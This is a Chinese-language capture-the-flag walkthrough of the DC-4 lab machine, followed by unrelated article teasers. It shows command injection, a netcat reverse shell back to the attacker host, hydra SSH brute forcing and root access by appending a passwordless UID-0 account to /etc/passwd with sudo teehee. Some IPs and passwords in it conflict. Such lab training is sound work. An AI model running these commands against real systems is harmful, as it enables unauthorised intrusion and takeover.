Vulhub 练习 DC-4靶机完整复现

news2024/11/17 10:42:33

1.工具

kali:攻击机 IP地址:192.168.200.4

DC-4:靶机 IP地址:暂时未知

2.注意

这里搭建环境两台机器应该选用同类的网络连接方式:这里两台的连接方式为模式

二、信息收集

1.主机发现

找寻同网段下存活的主机(可以根据DC-4的MAC地址看扫描出来的IP地址)

arp-scan -l  #第一种方式

1706592913_65b88a913813e9b2dec95.png!small?1706592913890

nmap -sP 192.168.200.0/24 -T4 # 第二种方式

1706592924_65b88a9c52a3eb3c4405b.png!small?1706592924870

2.端口扫描

查看此主机开放了哪些可以利用的端口信息

nmap -sV -p-  192.168.200.9

1706592937_65b88aa948833010fa352.png!small?1706592937787

3.后台目录扫描

1706592944_65b88ab094bd32d6b957f.png!small?1706592944921

4.网站指纹

通过以下两种方式可以准确知道网站的框架信息

①先登录网页,利用火狐插件查看

1706592955_65b88abb1efb99969b728.png!small?1706592955592

利用kali中的指纹识别命令whatweb扫描

1706592962_65b88ac29e151cc615488.png!small?1706592963006

网页提示信息是需要以admin用户进行登录的,那么现在只需要搞到密码就行

1706592970_65b88aca7b0454718df45.png!small?1706592970831

3.爆破密码

①暴力破解

1706592978_65b88ad2e641ba8d8dd69.png!small?1706592979356

得知password:happy

点击对应单选项,然后RUN发现是执行了每种ls指令,用BURP抓包

1706592865_65b88a619554e77caf9f3.png!small?1706592867523

linux中的操作指令

1706592993_65b88ae1a23328c0fda81.png!small?1706592994155

试试其他经典指令,比如whoami、ip addr这种的

看不到明显的信息,倒是可以知道此指令是可以执行的(页面200)

1706593003_65b88aeb228fba19227a8.png!small?1706593003662

还有一种就是在前端代码中寻找RUN时执行的对应指令,修改

尝试修改一下前端指令

1706593013_65b88af51998e238b7a6b.png!small?1706593013671

一样的效果

1706593023_65b88aff7f21470e498ff.png!small?1706593023818

三、反弹shell

1、首先在kali当中,使用nc进行端口监听

nc -lvvp 8899

1706593032_65b88b087c978cf9f3c87.png!small?1706593033269

2、修改命令 ,修改完后点击Go即可

nc 192.168.200.3 8899 -e /bin/bash 
#nc命令使用的是kali渗透机的ip地址,端口号需要和你上方nc监听端口一致

1706593043_65b88b132848d6363c7b4.png!small?1706593043663

3、回到kali,这是低权限用户

1706593051_65b88b1bacefecc020cb2.png!small?1706593052305

4.使用python的交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

方便我们操作,避免因为退出而导致需要重新或许使用nc反弹shell
应该是三个人名:charles jim sam

经查看old-passowrd.bak是一个密码文件,只有jim下有东西,其他的两个目录下都为空

1706593061_65b88b250643adbc8d5be.png!small?1706593061535

这是test.sh中的句子翻译,应该是暴力破解,而密码文件应该就在同级目录的那个文件当中

1706593071_65b88b2f1a10650ab2630.png!small?1706593071425

5、破解jim用户密码

,把old-passowrd.bak复制到kali中,使用hydra进行爆破,

hydra -l jim -P /home/kali/123.txt  ssh://192.168.200.9

需要等几分钟,得到密码

1706593080_65b88b383c39ce1208b2c.png!small?1706593080994

账号:jim

密码:jibr104

[22][ssh] host: 192.168.200.9   login: jim   password: jibril04

6、连接成功

1706593089_65b88b417df183dd8f87b.png!small?1706593090124

1706593097_65b88b498835475b27851.png!small?1706593097886

进入 到邮件目录

cd /var/mail 里

1706593104_65b88b502f8ef7d368a16.png!small?1706593104693

结尾可以看到是charles发来的信息,登录密码:^xHhA&hvim0y,切换登陆看看su charles

一些目录被限制了权限,进行提升权限

1706593111_65b88b576f905597dee92.png!small?1706593111870

权限提升

先用sudo -l看看自己有什么权限

teehee这个用户是不需要用密码登录的。

1706593119_65b88b5f5851ba57be8cd.png!small?1706593119727

四、提权

添加一个无密码用户,并使用teehee执行写入 passwd中

echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息命令解释程序(Shell)

**
添加一个用户,使用teehee执行写入到/etc/passwd中,加入到root权限组中**

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令

1706593131_65b88b6bb8b50cf5b1d0e.png!small?1706593132309

无密码直接登录账号admin

1706593138_65b88b7240b4849601536.png!small?1706593139722

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1462691.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

推荐几款项目经理常用的项目管理软件

随着科技的发展和项目需求,项目管理工具成为了确保工作顺利进行的关键。市场上有许多优秀的免费项目管理工具,它们功能强大、易于使用,并可以帮助团队更有效地规划、组织、执行和监控项目。以下是几款深受项目经理欢迎,好用且免费…

优化特征工程:创造性转换与有效处理

目录 前言1 利用领域知识2 多项式特征2.1 多项式特征的引入2.2 避免过拟合的策略2.3 模型解释性与多项式特征 3 缺失值处理3.1 填充缺失值的策略3.2 删除缺失值的考虑3.3 模型预测缺失值的应用 4 标准化和归一化4.1 标准化的应用4.2 归一化的适用场景4.3 特征缩放的注意事项 结…

【扩散模型:医学影像中的调查】

🚀 作者 :“码上有前” 🚀 文章简介 :深度学习 🚀 欢迎小伙伴们 点赞👍、收藏⭐、留言💬 去噪扩散模型 去噪扩散模型是一类生成模型,最近在各种深度学习问题中引起了极大的兴趣。扩…

【day02】每天三道 java后端面试题:Java、C++和Go的区别 | Redis的特点和应用场景 | 计算机网络七层模型

文章目录 1. Java、C和 Go 语言的区别,各自的优缺点?2. 什么是Redis?Redis 有哪些特点? Redis有哪些常见的应用场景?3. 简述计算机网络七层模型和各自的作用? 1. Java、C和 Go 语言的区别,各自的…

干货分享 | TSMaster 序列发送模块在汽车开发测试中的应用

众所周知,序列发送模块可以不需要脚本代码实现测试中特定控制报文序列的发送,该模块多用于循环顺序控制的测试案例中。序列发送模块的常用场景,主要是针对一些新开发的产品需要通过该模块来验证产品功能等等。本文重点和大家分享一下关于TSMa…

Java SourceDataLine 播放音频 显示频谱

Java SourceDataLine 播放MP3音频 显示频谱 1 添加依赖2 快速傅里叶变换2.1 FFT.java2.2 Complex.java 3 音频播放3.1 Player.java3.1 XPlayer.java 4 显示频谱5 结果 项目Value音频格式 添加依赖*.wav(JDK 原生支持)*.pcm(JDK 原生支持)*.au(JDK 原生支持)*.aiff(JDK 原生支持…

【算法与数据结构】200、695、LeetCode岛屿数量(深搜+广搜) 岛屿的最大面积

文章目录 一、200、岛屿数量1.1 深度优先搜索DFS1.2 广度优先搜索BFS 二、695、岛屿的最大面积2.1 深度优先搜索DFS2.2 广度优先搜索BFS 三、完整代码 所有的LeetCode题解索引,可以看这篇文章——【算法和数据结构】LeetCode题解。 一、200、岛屿数量 1.1 深度优先搜…

C#算法(12)—对图像像素做X/Y方向的偏移

我们在上位机开发领域有时候需要对获取的图像的像素做整体的偏移,比如所有像素在X方向上偏移几个像素,或者所有像素在Y方向上偏移几个像素,本文就是开发了像素整体偏移算法来解决这个问题。 比如有一个图像大小为3*3,像素值如下图1,如果我想实现将这个幅图像的像素整体往右…

[ Python+OpenCV+Mediapipe ] 实现对象识别

一、写在前面 本文所用例子为个人学习的小结,如有不足之处请各位多多海涵,欢迎小伙伴一起学习进步,如果想法可在评论区指出,我会尽快回复您,不胜感激! 所公布代码或截图均为运行成功后展示。 二、本文内容…

计网 - 域名解析的工作流程

文章目录 Pre引言1. DNS是什么2. 域名结构3. 域名解析的工作流程4. 常见的DNS记录类型5. DNS安全6. 未来的发展趋势 Pre 计网 - DNS 域名解析系统 引言 在我们日常使用互联网时,经常会输入各种域名来访问网站、发送电子邮件或连接其他网络服务。然而,我…

构建React TodoList应用:管理你的任务清单

构建React TodoList应用:管理你的任务清单 在日常生活和工作中,任务管理是一项至关重要的任务。为了更好地组织和管理我们的工作和生活,我们需要一个高效而简单的任务管理工具。本文将介绍如何使用React框架构建一个功能丰富的TodoList应用&…

C++动态分配内存知识点!

个人主页:PingdiGuo_guo 收录专栏:C干货专栏 大家好呀,又是分享干货的时间,今天我们来学习一下动态分配内存。 文章目录 1.动态分配内存的思想 2.动态分配内存的概念 2.1内存分配函数 2.2动态内存的申请和释放 2.3内存碎片问…

新手学习Cesium的几点建议

Cesium是当前非常火热的三维数字地球开发框架,很多公司基于Cesium做项目以及形成了自己的产品,关于Cesium的学习,有诸多网站、书籍、学习资料甚至培训教材,这里不再详细推荐,从学习Cesium的角度,资料和教程…

web开发中的长度单位详解

1、长度单位包括哪些? 长度单位:例如,厘米、毫米、英寸。还有像素(px),元素的字体高度(em)、字母x的高度(ex)、百分比(%)等这些单位&…

[ 2024春节 Flink打卡 ] -- Paimon

2024,游子未归乡。工作需要,flink coding。觉知此事要躬行,未休,特记 Flink 社区希望能够将 Flink 的 Streaming 实时计算能力和 Lakehouse 新架构优势进一步结合,推出新一代的 Streaming Lakehouse 技术,…

MySQL加锁策略详解

我们主要从三个方面来讨论这个问题: 啥时候加?如何加?什么时候该加什么时候不该加? 1、啥时候加 1.1 显式锁 MySQL 的加锁可以分为显式加锁和隐式加锁,显式加锁我们比较好识别的,因为他往往直接体现在 S…

25-k8s集群中-RBAC用户角色资源权限

一、RBAC概述 1,k8s集群的交互逻辑(简单了解) 我们通过k8s各组件架构,指导各个组件之间是使用https进行数据加密及交互的,那么同理,我们作为“使用”k8s的各种资源,也是通过https进行数据加密的…

4 编写达梦插件包

1、初始化达梦数据库 具体脚本可以参考: https://github.com/nacos-group/nacos-plugin/blob/develop/nacos-datasource-plugin-ext/nacos-dm-datasource-plugin-ext/src/main/resources/schema/nacos-dm.sql

国际阿里云,想要使用怎么解决支付问题

在国内我们很多时候都需要用到国际阿里云,在国际阿里云需要使用就需要支付,自己办理visa卡比较麻烦,那么我们可以使用虚拟卡,虚拟卡办理快速简单 真实测评使用Fomepay的5347支持国际阿里云的支付,秒下卡,不…

Talk|北京大学杨灵:扩散模型的算法创新与领域应用

本期为TechBeat人工智能社区第572期线上Talk。 北京时间2月21日(周三)20:00,北京大学博士生—杨灵的Talk已准时在TechBeat人工智能社区开播! 他与大家分享的主题是: “扩散模型的算法创新与领域应用”,系统地介绍了他的团队基于扩散模型的算法…